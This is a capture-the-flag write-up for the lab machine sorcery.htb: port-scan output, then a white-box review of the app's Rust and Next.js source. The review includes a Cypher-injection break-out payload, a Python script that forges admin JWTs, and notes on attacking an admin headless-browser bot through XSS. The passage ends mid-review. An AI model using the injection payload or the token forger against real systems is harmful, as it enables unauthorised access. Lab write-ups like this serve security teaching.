RECON
Port Scan
$ rustscan -a $target_ip --ulimit 2000 -r 1-65535 -- -A -sC -Pn
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 79:93:55:91:2d:1e:7d:ff:f5:da:d9:8e:68:cb:10:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBfa7NkcG06jauyQoChLbmUKvvd6pkaufyqxTH7Lc0LeTfUmDv2PZsCeNM0mm6JytOdhIhsLONllRYME0Fizhjw=
| 256 97:b6:72:9c:39:a9:6c:dc:01:ab:3e:aa:ff:cc:13:4a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPzwgWWL8qvTI4EzWXUX7/aGWcm8W4pTGnFiqfVbeOeh
443/tcp open ssl/http syn-ack nginx 1.27.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://sorcery.htb/
|_http-server-header: nginx/1.27.1
| ssl-cert: Subject: commonName=sorcery.htb
| Issuer: commonName=Sorcery Root CA
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-31T02:09:11
| Not valid after: 2052-03-18T02:09:11
| MD5: c294:7d7a:2965:5c32:3dc9:b850:e2e5:0d9a
| SHA-1: 9d44:6d3d:5fb6:252c:da8b:3dd1:b5a2:aeb3:1e4b:5534
| -----BEGIN CERTIFICATE-----
| MIIEuTCCAqECFFDAAPGK7ud2DPpuM8BMaxLfK0U+MA0GCSqGSIb3DQEBCwUAMBox
| ...
| 4PPnLBiUeFv9xmOPvw==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 443 serves the web application, so we can run whatweb to extract metadata:
$ whatweb https://sorcery.htb
https://sorcery.htb [307 Temporary Redirect] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.27.1], IP[10.129.113.32], RedirectLocation[/auth/login], Script, Title[Sorcery], UncommonHeaders[link], X-Powered-By[Next.js], nginx[1.27.1]
https://sorcery.htb/auth/login [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.27.1], IP[10.129.254.122], PasswordField[password], Script, Title[Sorcery], UncommonHeaders[x-nextjs-cache], X-Powered-By[Next.js], nginx[1.27.1]
The root path / redirects to /auth/login (Next.js app):
- Title: Sorcery
- Headers:
  X-Powered-By: Next.js
  UncommonHeaders: x-nextjs-cache, link
- TLS Cert: Custom CA (Sorcery Root CA)
Port 443
We browse to https://sorcery.htb/auth/login and uncover the application's login surface:

The presence of the admin account confirms username enumeration is in play:

Following the trail to https://git.sorcery.htb/nicole_sullivan/infrastructure unveils a publicly exposed Gitea repository, pinned at version 1.22.1:

This sets the tone: a white-box code audit mission, where entry hinges on known credentials, WebAuthn passkeys, or a seller-exclusive Registration Key:

WEB
Code Review
Since this is a Rust-based code review of a full-stack project, I'll place anchors throughout the exploitation chain to reference key source files and technical breakdowns below.
You can skip the in-depth code spelunking and jump straight to the exploit paths via those anchors. But if you're here to dissect the project itself and understand how the exploits work in detail — do read on.
Overview
The application is part of an open-source suite titled infrastructure, authored by nicole_sullivan. With source access wide open, this is a rare opportunity for clean, controlled white-box vulnerability hunting.
Let's pull down the full repo for local dissection:
GIT_SSL_NO_VERIFY=1 \
git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git
With the full tree structure:
infrastructure
├── backend
│ ├── Cargo.lock
│ ├── Cargo.toml
│ ├── Dockerfile
│ ├── Rocket.toml
│ └── src
│ ├── api
│ │ ├── auth
│ │ │ ├── login.rs
│ │ │ └── register.rs
│ │ ├── auth.rs
│ │ ├── blog
│ │ │ └── get.rs
│ │ ├── blog.rs
│ │ ├── debug
│ │ │ └── debug.rs
│ │ ├── debug.rs
│ │ ├── dns
│ │ │ ├── get.rs
│ │ │ └── update.rs
│ │ ├── dns.rs
│ │ ├── products
│ │ │ ├── get_all.rs
│ │ │ ├── get_one.rs
│ │ │ └── insert.rs
│ │ ├── products.rs
│ │ ├── webauthn
│ │ │ ├── passkey
│ │ │ │ ├── finish_authentication.rs
│ │ │ │ ├── finish_registration.rs
│ │ │ │ ├── get.rs
│ │ │ │ ├── start_authentication.rs
│ │ │ │ └── start_registration.rs
│ │ │ └── passkey.rs
│ │ └── webauthn.rs
│ ├── api.rs
│ ├── db
│ │ ├── connection.rs
│ │ ├── initial_data.rs
│ │ ├── models
│ │ │ ├── post.rs
│ │ │ ├── product.rs
│ │ │ └── user.rs
│ │ └── models.rs
│ ├── db.rs
│ ├── error
│ │ └── error.rs
│ ├── error.rs
│ ├── main.rs
│ ├── state
│ │ ├── browser.rs
│ │ ├── dns.rs
│ │ ├── kafka.rs
│ │ ├── passkey.rs
│ │ ├── privileges.rs
│ │ └── webauthn.rs
│ └── state.rs
├── backend-macros
│ ├── Cargo.lock
│ ├── Cargo.toml
│ └── src
│ └── lib.rs
├── dns
│ ├── Cargo.lock
│ ├── Cargo.toml
│ ├── convert.sh
│ ├── docker-entrypoint.sh
│ ├── Dockerfile
│ ├── src
│ │ └── main.rs
│ └── supervisord.conf
├── docker-compose.yml
└── frontend
├── components.json
├── Dockerfile
├── next.config.mjs
├── package.json
├── package-lock.json
├── postcss.config.mjs
├── public
│ ├── next.svg
│ └── vercel.svg
├── src
│ ├── api
│ │ ├── client.ts
│ │ └── error.ts
│ ├── app
│ │ ├── auth
│ │ │ ├── layout.tsx
│ │ │ ├── login
│ │ │ │ ├── actions.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── logout
│ │ │ │ └── route.tsx
│ │ │ ├── passkey
│ │ │ │ └── page.tsx
│ │ │ ├── register
│ │ │ │ ├── actions.tsx
│ │ │ │ └── page.tsx
│ │ │ └── tabs.tsx
│ │ ├── dashboard
│ │ │ ├── blog
│ │ │ │ └── page.tsx
│ │ │ ├── debug
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page-client.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── dns
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page-client.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── layout.tsx
│ │ │ ├── new-product
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page-client.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── page.tsx
│ │ │ ├── profile
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page.tsx
│ │ │ │ └── passkey.tsx
│ │ │ ├── store
│ │ │ │ ├── all-tabs.tsx
│ │ │ │ ├── breadcrumbs.tsx
│ │ │ │ ├── page.tsx
│ │ │ │ └── [product]
│ │ │ │ ├── not-found.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── tabs-inner.tsx
│ │ │ └── tabs.tsx
│ │ ├── favicon.ico
│ │ ├── globals.css
│ │ ├── layout.tsx
│ │ ├── page.tsx
│ │ └── providers.tsx
│ ├── components
│ │ ├── misc
│ │ │ └── theme-provider.tsx
│ │ └── ui
│ │ ├── alert.tsx
│ │ ├── breadcrumb.tsx
│ │ ├── button.tsx
│ │ ├── card.tsx
│ │ ├── checkbox.tsx
│ │ ├── form.tsx
│ │ ├── input.tsx
│ │ ├── label.tsx
│ │ ├── table.tsx
│ │ ├── tabs.tsx
│ │ ├── toaster.tsx
│ │ ├── toast.tsx
│ │ └── use-toast.ts
│ ├── entity
│ │ ├── dns-entry.ts
│ │ ├── post.ts
│ │ ├── product.ts
│ │ ├── user-server.ts
│ │ └── user.ts
│ ├── hooks
│ │ └── useAuth.tsx
│ ├── lib
│ │ └── utils.ts
│ └── protect
│ └── protect.tsx
├── tailwind.config.ts
└── tsconfig.json
44 directories, 123 files
We now have unfiltered access to the full stack: Frontend powered by Next.js, Backend crafted in Rust with Rocket, and the glue — Infrastructure managed via Docker + Compose.
- The backend runs a Rocket-powered API, with Chromium woven in for dynamic rendering tasks.
- Feature set includes:
  - WebAuthn authentication
  - APIs for blog, products, DNS, debug, and auth
- Chromium is spawned from state/browser.rs — a smoking gun for headless automation.
- A suspicious debug route is exposed — likely unprotected or misused.
- Frontend runs on Next.js SSR, complete with dashboard logic, passkey login, a bundled API client, and notably, a debug page wired in.
This ecosystem screams XSS + headless browser — a playground for phishing payloads and post-XSS browser-based bot exploitation.
Docker
Dockerfile
From the Dockerfile, we can discover it installs chromium at line 36:
RUN apt-get install -y chromium
This is extremely unusual in a backend container — it might suggest:
- Headless browser automation (e.g., screenshotting, PDF rendering, or SSRF headless fetches)
- A bot admin feature like URL preview, phishing checker
This implies it could be vulnerable to attacks such as XSS-driven phishing of the headless browser, or SSRF.
Docker-compose
The docker-compose.yml of this application reveals the environment consists of backend services, internal utilities, and potential targets. The stack includes:
1. backend
Rust Rocket API service:
- Listens on 0.0.0.0 (port 8000), internal-only by default
- Connected to neo4j (port 7687) and kafka (port 9092)
- Sensitive env vars: SITE_ADMIN_PASSWORD, DATABASE_*, KAFKA_BROKER
2. frontend
React/Next JS web app:
- Talks to backend via API_PREFIX
- Exposes port 3000, proxied via nginx
3. neo4j
The graph database:
- Port 7687
- Used as main DB
- Auth via ${DATABASE_USER}:${DATABASE_PASSWORD}
This could be vulnerable to Cypher Injection if queries are not properly parameterized.
4. kafka
Messaging broker:
- Broker for backend ↔ dns, mail_bot
- Port 9092
If Kafka write access is gained, we can trigger DNS or phishing logic.
5. dns
Worker service that updates DNS entries based on Kafka messages:
- Listens to the Kafka update topic
- DNS entries are updated in memory via serde_json::<Vec<DnsEntry>>
6. ftp
Anonymous FTP server
- Anonymous read access (ANONYMOUS_ACCESS: true)
- Serves certs from /ftp/pub: RootCA.crt, RootCA.
- A private key leaked via FTP is highly dangerous if the CA is trusted
- Exposes port 21
7. gitea
Self-hosted Git service:
- Port 3000 internally
- Auth-controlled: DISABLE_REGISTRATION=true
This is used by developers (e.g., nicole_sullivan) — it can host secrets.
8. mail_bot
Automated phishing bot
- Interacts with Mailhog and SMTP
- Phishing logic: looks for EXPECTED_RECIPIENT from MAILHOG_SERVER
- Contains SMTP creds in env
Write a malicious email → possible phishing interaction triggered via Kafka?
9. nginx
All interaction to frontend/backend flows through this:
- TLS reverse proxy (443)
- Routes to: frontend:3000, gitea:3000
Main
The main.rs from the Backend runs graph database migration on boot:
async fn launch() -> _ {
let graph = GRAPH.get().await;
migrate(graph).await;
...
};
It caches the admin privilege level into the global PRIVILEGES map:
{
let admin = User::get_by_username("admin".to_string()).await.unwrap();
PRIVILEGES
.lock()
.unwrap()
.privileges
.insert(admin.id, UserPrivilegeLevel::Admin);
}
It limits headless Chromium sessions via the MAX_SEMAPHORE_PERMITS env var:
let max_semaphore_permits = std::env::var("MAX_SEMAPHORE_PERMITS")
.map(|item| item.parse::<usize>().unwrap())
.unwrap_or(5);
...
rocket::build()
.manage(BrowserStore {
semaphore: Arc::new(Semaphore::new(max_semaphore_permits)),
})
Passkey + WebAuthn setup:
rocket::build()
...
.manage(PasskeyStore {
..Default::default()
})
.manage({
let rp_id = "sorcery.htb";
let rp_origin = Url::parse("https://sorcery.htb").unwrap();
let builder = WebauthnBuilder::new(rp_id, &rp_origin).expect("Webauthn builder");
WebauthnStore {
instance: Arc::new(Mutex::new(builder.build().expect("Webauthn build"))),
}
Standard Kafka setup:
let mut consumer = Consumer::from_hosts(vec![broker.clone()])
.with_topic(topic)
.with_group(group)
.with_fallback_offset(FetchOffset::Earliest)
.with_offset_storage(Some(GroupOffsetStorage::Kafka))
.create()
.unwrap_or_else(|_| panic!("Kafka consumer: {broker}"));
GroupOffsetStorage::Kafka means offsets are tracked inside Kafka, shared per group.
Kafka is a message broker — basically, it's a system that lets different parts of an application send and receive data (called "messages") in real-time, like a chat server, but for machines.
Here, Kafka is used to send DNS records from somewhere into the backend.
Consumer Polling Thread:
thread::spawn(move || loop {
let Ok(message_sets) = consumer.poll() else {
continue;
};
for message_set in message_sets.iter() {
for message in message_set.messages() {
let Ok(entries) = serde_json::from_slice::<Vec<DnsEntry>>(message.value) else {
continue;
};
DNS.lock().unwrap().entries = entries;
}
consumer.consume_messageset(message_set).ok();
This background thread constantly polls the Kafka topic "get" for new messages. For each message, it deserializes message.value into Vec<DnsEntry>; if valid, it overwrites the global in-memory DNS list.
From backend/state/dns.rs:
#[derive(Serialize, Deserialize, Debug, Clone)]
pub struct DnsEntry {
    pub name: String,
    pub value: String,
}
This means the DNS entries coming from Kafka are just simple key-value pairs, like:
[
  { "name": "admin.sorcery.htb", "value": "127.0.0.1" },
  { "name": "api.sorcery.htb", "value": "10.10.13.3" }
]
So the Kafka stream lets the backend live-update fake DNS mappings.
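The consumer's behavior boils down to "parse a JSON array, replace the global list". A minimal Python sketch of that logic (function and variable names here are mine, not from the codebase):

```python
import json

# Global in-memory DNS list, mirroring the backend's DNS.lock().unwrap().entries
DNS_ENTRIES: list = []

def handle_message(value: bytes) -> None:
    """Mimic the Kafka poll loop: ignore invalid JSON, else overwrite the list."""
    global DNS_ENTRIES
    try:
        entries = json.loads(value)
    except ValueError:
        return  # mirrors the `let Ok(entries) = ... else { continue }` guard
    if isinstance(entries, list):
        DNS_ENTRIES = entries

handle_message(b'[{"name": "admin.sorcery.htb", "value": "127.0.0.1"}]')
handle_message(b'not json')  # silently ignored; the list keeps its last valid state
```

Anyone who can publish valid JSON to the topic therefore fully controls the backend's view of DNS.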
This .mount(...) section defines the public API surface of the backend — each call maps a URL path prefix to a set of routes (endpoints) implemented in Rust:
.mount(
"/api/auth",
routes![api::auth::register::register, // User account creation
api::auth::login::login], // Issues JWT on password-based login
)
.mount(
"/api/product", // E-commerce–style endpoints
routes![
api::products::get_one::get_one, // GET /api/product/<id> — Get one
api::products::get_all::get_all, // GET /api/product — List all
api::products::insert::insert_product, // POST /api/product — Create new
],
)
.mount(
"/api/webauthn/passkey", // Handles WebAuthn passkey-based login and registration
routes![
api::webauthn::passkey::start_registration::start_registration,
api::webauthn::passkey::finish_registration::finish_registration,
api::webauthn::passkey::get::get,
api::webauthn::passkey::start_authentication::start_authentication,
api::webauthn::passkey::finish_authentication::finish_authentication,
],
)
.mount(
"/api/dns",
routes![api::dns::get::get_entries, // GET /api/dns — Shows current DNS entries
api::dns::update::update_dns,], // POST /api/dns — Updates them (if auth allows)
)
.mount("/api/debug", routes![api::debug::debug::port_data]) // POST /api/debug/port: Specify host, port, and raw data to send
.mount("/api/blog", routes![api::blog::get::get_blog_posts])
The comments inside should explain everything.
Login
Frontend
Under frontend/src/hooks/useAuth.tsx we can discover it authenticates with a JWT token stored in a cookie:
export async function maybeGetUserOnServer(): Promise<User | null> {
const jwt = cookies().get("token");
if (jwt) {
return User.fromJwt(jwt.value);
}
return null;
}
Backend
At line 41, it verifies the password with Argon2 against the stored hash from the DB:
if Argon2::default()
.verify_password(
password.as_bytes(),
&PasswordHash::new(&user.password).unwrap(),
)
From line 50, we know the token is set to expire in 24 hours, and the claims include privilege level, username, and a passkey flag (set to false for now):
let claim = UserClaims {
id: user.id,
username: username.to_owned(),
privilege_level: user.privilege_level,
with_passkey: false,
only_for_paths: None,
exp: SystemTime::now()
.add(Duration::from_secs(60 * 60 * 24))
.duration_since(UNIX_EPOCH)
.unwrap()
.as_secs() as usize,
};
Then it signs a JWT token from line 62:
let token = encode(
&Header::default(),
&claim,
&EncodingKey::from_secret(JWT_SECRET.as_bytes()),
)
.unwrap();
It uses HS256 by default (symmetric secret from JWT_SECRET). And the cookie is not marked Secure (.secure(false)), so the token can be sent over unencrypted HTTP — defined at line 62:
cookies.add(
Cookie::build(("token", token.clone()))
.path("/")
.secure(false)
.http_only(false),
);
JavaScript in the browser can read the token (.http_only(false)), making it vulnerable to XSS.
Finally, it returns the token also in the response body:
Ok(Json(Response { token }))
This further increases exposure.
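Because the token is plain HS256 signed with a shared JWT_SECRET, anyone who recovers that secret can mint arbitrary claims. A minimal sketch using only the Python standard library — the secret and claim values below are placeholders, not the real ones:

```python
import base64, hashlib, hmac, json, time

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_token(secret: str, claims: dict) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

# Claim layout copied from the backend's UserClaims struct
claims = {
    "id": "00000000-0000-0000-0000-000000000000",  # placeholder UUID
    "username": "admin",
    "privilege_level": 2,        # Admin
    "with_passkey": True,
    "only_for_paths": None,
    "exp": int(time.time()) + 60 * 60 * 24,
}
token = forge_token("leaked-secret", claims)  # placeholder secret
```

If the secret ever leaks (env var, repo, debug output), the entire auth model collapses to this one function.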
Register
Frontend
Under frontend/src/app/auth/register/page.tsx, we see registrationKey is optional on the frontend — it's only used if present and is passed to the backend:
const schema = z.object({
username: z.string().min(1),
password: z.string().min(1),
registrationKey: z.string().optional(),
});This suggests differentiated registration flows (e.g., normal user vs elevated roles like "seller").
It calls register():
const response = await register(username, password, registrationKey);
From @/app/auth/register/actions (actions.tsx):
export async function register(
username: string,
password: string,
registrationKey?: string,
): Promise<APIResponse<null>> {
const response = await API().post("auth/register", {
json: {
username,
password,
registrationKey,
},
});
return convertResponse(response);
The backend then verifies the registrationKey to perform role assignment or privilege elevation during account creation.
Backend
The register.rs uses strong password hashing and generates unique ID:
let hash = create_hash(&password)?;
let id = Uuid::new_v4().to_string();
Again, registration_key is optional:
#[derive(Deserialize, Validate)]
pub struct Request {
username: String,
password: String,
registration_key: Option<String>,
}
If the provided registration_key exactly matches the value stored in REGISTRATION_KEY, the user becomes a Seller, defined at line 41:
privilege_level: if registration_key.is_some()
&& &registration_key.unwrap() == REGISTRATION_KEY.get().await
{
UserPrivilegeLevel::Seller
} else {
UserPrivilegeLevel::Client
}
Passkey
start_registration.rs
The backend/src/api/webauthn/ directory handles passkey-based authentication (FIDO2/WebAuthn).
start_registration.rs, handles the first step of WebAuthn (passkey) registration — generating and issuing a challenge to the frontend client:
struct Request {
#[validate(custom(function = "validate_username"))]
username: Option<String>,
}
If username is not given, it falls back to guard.claims.username (from the JWT).
From line 30, the code shows that we can interact with the POST /register/start API:
#[post("/register/start", format = "json", data = "<data>")]
pub async fn start_registration(
guard: RequireAuthentication,
data: Validated<Json<Request>>,
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
)
We must be logged in to access this endpoint — passkey registration is a secondary auth factor, not primary.
If a username is provided, it's used; otherwise, defaults to the logged-in user:
let username = username.as_ref().unwrap_or(&guard.claims.username);
It then uses webauthn_rs to generate a secure challenge:
start_passkey_registration(Uuid::from_str(&user.id).unwrap(), username, username, None)
And tracks the pending registration challenge for the user (probably expiring after a timeout):
passkey_store.registrations.lock().unwrap().insert(user.id.clone(), state);
finish_registration.rs
The finish_registration.rs endpoint finalizes the WebAuthn (passkey) registration process. It's the critical second half after the challenge is created in start_registration.rs.
Route:
#[derive(Deserialize)]
struct Request {
credential: RegisterPublicKeyCredential, // A full WebAuthn credential response
}
to POST /register/finish:
#[post("/register/finish", format = "json", data = "<data>")]
pub fn finish_registration(
guard: RequireAuthentication,
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
data: Json<Request>,
)
Once the credential is verified, it's stored for the user in passkeys:
Ok(passkey) => {
registrations.remove(&guard.claims.id);
passkey_store
.passkeys
.lock()
.unwrap()
.insert(guard.claims.id, passkey);
Ok(Json(Response {}))
}
start_authentication.rs
This start_authentication.rs endpoint handles the first step of WebAuthn login, where the server generates a challenge based on the user's registered passkey.
Input:
struct Request {
#[validate(custom(function = "validate_username"))]
username: String,
}
to endpoint POST /authenticate/start:
#[post("/authenticate/start", format = "json", data = "<data>")]
pub async fn start_authentication(
data: Validated<Json<Request>>,
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
)
If the user doesn't exist → returns AppError::NotFound:
User::get_by_username(username.clone()).await
If the user exists but has no registered passkey, it also returns NotFound:
let passkeys = passkey_store.passkeys.lock().unwrap();
let Some(passkey) = passkeys.get(&user.id) else {
return Err(AppError::NotFound);
};
This prevents reusing/forging credential registration unless the session is active.
Validates the credential against the stored state with standard WebAuthn flows:
.finish_passkey_registration(&data.credential, state)
Uses webauthn_rs to generate a WebAuthn RequestChallengeResponse:
start_passkey_authentication(&[passkey.clone()])And challenge state is stored in PasskeyStore memory:
authentications.insert(user.id.clone(), state);
finish_authentication.rs
The finish_authentication.rs route finalizes WebAuthn (passkey) login.
Input:
struct Request {
credential: PublicKeyCredential, // WebAuthn signed response
#[validate(custom(function = "validate_username"))]
username: String,
}
To endpoint POST /authenticate/finish:
#[post("/authenticate/finish", format = "json", data = "<data>")]
pub async fn finish_authentication(
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
data: Validated<Json<Request>>,
cookies: &CookieJar<'_>,
)
The challenge (state) must have been stored in memory from /authenticate/start:
let mut authentications = passkey_store.authentications.lock().unwrap();
Uses webauthn_rs to validate the signature, challenge, and authenticator data:
let Some(state) = authentications.get(&user.id) else {
return Err(AppError::Unauthorized);
};
if let Err(error) = webauthn_store
.instance
.lock()
.unwrap()
.finish_passkey_authentication(&credential, state)
{
println!("{error}");
return Err(AppError::Unknown);
};
Then follows a session cleanup to prevent reuse of old challenge state (no double submission):
authentications.remove(&user.id);
After that, it generates a JWT token:
let claim = UserClaims {
id: user.id,
username: user.username.to_owned(),
privilege_level: user.privilege_level,
with_passkey: true,
only_for_paths: None,
exp: SystemTime::now()
.add(Duration::from_secs(60 * 60 * 24))
.duration_since(UNIX_EPOCH)
.unwrap()
.as_secs() as usize,
};
let token = encode(
&Header::default(),
&claim,
&EncodingKey::from_secret(jwt_secret),
)
.unwrap();
Builds a JWT including:
- id, username, privilege_level
- with_passkey: true
- exp = 24 hours from now
Same logic as the one in login.rs — but this token marks the user as "passkey-authenticated" (with_passkey: true).
Again the JWT token is then added to the insecure session cookie:
cookies.add(
Cookie::build(("token", token.clone()))
.path("/")
.secure(false)
.http_only(false),
);
The cookie is again not marked Secure (secure(false)) and is readable from JavaScript (http_only(false)) → XSS risk.
Returns the JWT in the HTTP body:
Ok(Json(Response { token }))
Even if the cookie were secured, this makes the token readable by JavaScript or XSS.
Products (SQLi)
get_all.rs
The get_all() endpoint under /api/product can be accessed by any logged-in user with at least UserPrivilegeLevel::Client (e.g., Seller, Admin):
pub async fn get_all(guard: RequireClient)
It calls the database layer: Product::get_all() — gets all products from the DB:
Product::get_all()
.await
.into_iter()
.filter(|product| product.should_show_for_user(&guard.claims))
.collect()
And filters each product using .should_show_for_user(...), passing the authenticated user's claims.
So, users only see products they are authorized to view.
get_one.rs
GET /api/product/<id> retrieves a single product by ID, but requires authentication as well:
pub async fn get_one(guard: RequireClient, id: &str)
It performs explicit visibility checks before returning the product:
let product = match Product::get_by_id(id.to_owned()).await {
Some(product) => product,
None => return Err(AppError::NotFound),
};
if !product.should_show_for_user(&guard.claims) {
return Err(AppError::NotFound);
}
Behavior:
- Looks up the product by ID (probably a UUID or short string).
- If not found → returns 404 NotFound.
- If found but the user isn't allowed to view it → also returns 404.
The 404 NotFound response matters in our exploit.
However, is there any unsafe query building for Product::get_by_id()?
We can examine how the query is built via a Rust procedural macro that generates functions like get_by_id, in backend-macros/src/lib.rs at line 143:
let get_functions = fields.iter().map(|&FieldWithAttributes { field, .. }| {
let name = field.ident.as_ref().unwrap(); // e.g., "id", "username"
let type_ = &field.ty; // field type
let name_string = name.to_string(); // in our case, "id"
let function_name = syn::Ident::new(
&format!("get_by_{}", name_string), // creates Ident: get_by_id
proc_macro2::Span::call_site(),
);
quote! {
pub async fn #function_name(#name: #type_) -> Option<Self> {
let graph = crate::db::connection::GRAPH.get().await;
// [!] Vulnerable: Cypher Injection
let query_string = format!(
r#"MATCH (result: {} {{ {}: "{}" }}) RETURN result"#,
#struct_name, #name_string, #name
);
let row = match graph.execute(
::neo4rs::query(&query_string)
).await.unwrap().next().await {
Ok(Some(row)) => row,
_ => return None
};
Self::from_row(row).await
}
}
});
This macro is vulnerable to Cypher Injection, specifically due to how the query is built:
let query_string = format!(
r#"MATCH (result: {} {{ {}: "{}" }}) RETURN result"#,
#struct_name, #name_string, #name
);
The query uses format! to directly embed unescaped user input (#name) into the Cypher query string. That means if the input contains quotes or malicious Cypher code, it can break out of the query context and execute arbitrary Cypher.
For example:
get_by_id("someid\"}) RETURN 1 AS injected //--")
This would produce:
MATCH (result: Product { id: "someid"}) RETURN 1 AS injected //--" }) RETURN result
This changes the behavior of the query, potentially leaking data, bypassing auth, or even modifying the graph if used in write contexts.
JACKPOT.
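To see the break-out concretely, here is a quick Python reproduction of the macro's format! interpolation (the helper function is illustrative — the real code is the Rust macro above):

```python
def build_query(struct_name: str, field: str, value: str) -> str:
    # Mirrors the vulnerable format! call: `value` is embedded with no escaping
    return f'MATCH (result: {struct_name} {{ {field}: "{value}" }}) RETURN result'

# The payload closes the string and node pattern, then injects its own RETURN;
# everything after //-- is commented out
payload = 'someid"}) RETURN 1 AS injected //--'
query = build_query("Product", "id", payload)
print(query)
```

Printing `query` yields exactly the broken-out Cypher statement shown above.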
insert.rs
insert.rs inserts a new product, then renders it via a headless browser as an admin user.
But the RequireSeller role is required to access POST /api/product/:
#[post("/", data = "<data>")]
pub async fn insert_product(
guard: RequireSeller,
browser_store: &State<BrowserStore>,
data: Json<Request>,
)
It accepts name and description:
#[derive(Deserialize)]
struct Request {
name: String,
description: String,
}
Then it saves Product { name, description, ... } to the DB:
let id = Uuid::new_v4().to_string();
let product = Product {
id: id.to_string(),
name: data.name.clone(),
description: data.description.clone(),
is_authorized: false,
created_by_id: guard.claims.id,
};
product.save().await;
It then launches a headless Chromium browser as the admin user:
// Login as admin user
let user = User::get_by_username("admin".to_string()).await.unwrap();
let claim = UserClaims {
id: user.id,
username: user.username.to_owned(),
privilege_level: user.privilege_level,
with_passkey: true,
only_for_paths: Some(vec![
r"^\/api\/product\/[a-zA-Z0-9-]+$".to_string(),
r"^\/api\/webauthn\/passkey\/register\/start$".to_string(),
r"^\/api\/webauthn\/passkey\/register\/finish$".to_string(),
]),
exp: SystemTime::now()
.add(Duration::from_secs(60))
.duration_since(UNIX_EPOCH)
.unwrap()
.as_secs() as usize,
};
let token = encode(
&Header::default(),
&claim,
&EncodingKey::from_secret(JWT_SECRET.as_bytes()),
)
.unwrap();
// Launches Chromium headless browser
tokio::task::spawn(async move {
// URL = INTERNAL_FRONTEND/dashboard/store/<product_id>, loaded by admin bot.
let url = format!("{}/dashboard/store/{}", &*INTERNAL_FRONTEND, product.id);
...
let browser = Browser::new(launch_options).unwrap();
let tab = browser.new_tab().unwrap();
tab.set_cookies(vec![CookieParam {
name: "token".to_string(),
value: token,
url: Some(INTERNAL_FRONTEND.clone()),
domain: None,
path: None,
secure: None,
http_only: Some(true),
same_site: None,
expires: None,
priority: None,
same_party: None,
source_scheme: None,
source_port: None,
partition_key: None,
}])
.unwrap();
tab.navigate_to(&url.clone()).unwrap();
};
DB
user.rs
From the user.rs, we understand how user identities and privilege levels are modeled in this application.
The User struct is decorated with a procedural macro #[derive(Model)] from backend_macros, which generates useful query helpers like get_by_id() and get_by_username():
#[derive(Model, Debug, Deserialize)]
pub struct User {
pub id: String,
pub username: String,
pub password: String,
#[transient(fetch = "fetch_privilege_level", save = "save_privilege_level")]
pub privilege_level: UserPrivilegeLevel,
}
The field privilege_level is not stored in the database. Instead, it's dynamically fetched and stored in memory through:
impl User {
pub fn fetch_privilege_level(id: String) -> UserPrivilegeLevel {
*PRIVILEGES
.lock()
.unwrap()
.privileges
.get(&id)
.unwrap_or(&UserPrivilegeLevel::Client)
}
This reads the privilege from the global PRIVILEGES map, defaulting to Client if not found.
⚠️ User::get_by_id(user_input) or User::get_by_username(user_input) are generated by the Model macro and internally build Cypher queries. If user_input is not sanitized, Cypher Injection is possible.
The UserPrivilegeLevel is an enum that maps numeric levels to roles:
#[derive(Clone, Copy, PartialOrd, PartialEq, Debug)]
pub enum UserPrivilegeLevel {
Client = 0,
Seller = 1,
Admin = 2,
}
It includes a helper for converting integers into enum variants:
impl UserPrivilegeLevel {
const fn from_level(level: usize) -> Option<Self> {
match level {
0 => Some(Self::Client),
1 => Some(Self::Seller),
2 => Some(Self::Admin),
_ => None,
}
}
}
This function is used internally during deserialization:
impl<'de> Deserialize<'de> for UserPrivilegeLevel {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error> {
let level = usize::deserialize(deserializer)?;
Ok(UserPrivilegeLevel::from_level(level).unwrap())
}
}
Currently, this risk is mitigated because the User struct uses #[transient], preventing external input from setting privilege_level. However, if any other struct exposes UserPrivilegeLevel directly, this becomes a privilege escalation vector via crafted JSON payloads.
product.rs
The Product struct defines a single product entry in the application:
#[derive(Model, Serialize, Deserialize)]
pub struct Product {
pub id: String,
pub name: String,
pub description: String,
pub is_authorized: bool,
pub created_by_id: String,
}
It uses the #[derive(Model)] macro (from backend_macros) — same as in User. This implies automatic generation of Cypher-based query functions like get_by_id() and get_all().
Access control (we mentioned earlier) is encapsulated in the method:
pub fn should_show_for_user(&self, claims: &UserClaims) -> bool {
self.is_authorized
|| claims.privilege_level == UserPrivilegeLevel::Admin
|| self.created_by_id == claims.id
}
This allows visibility if:
- the product is explicitly marked as authorized, or
- the requester is an Admin, or
- the requester is the creator of the product.
This function is used in both:
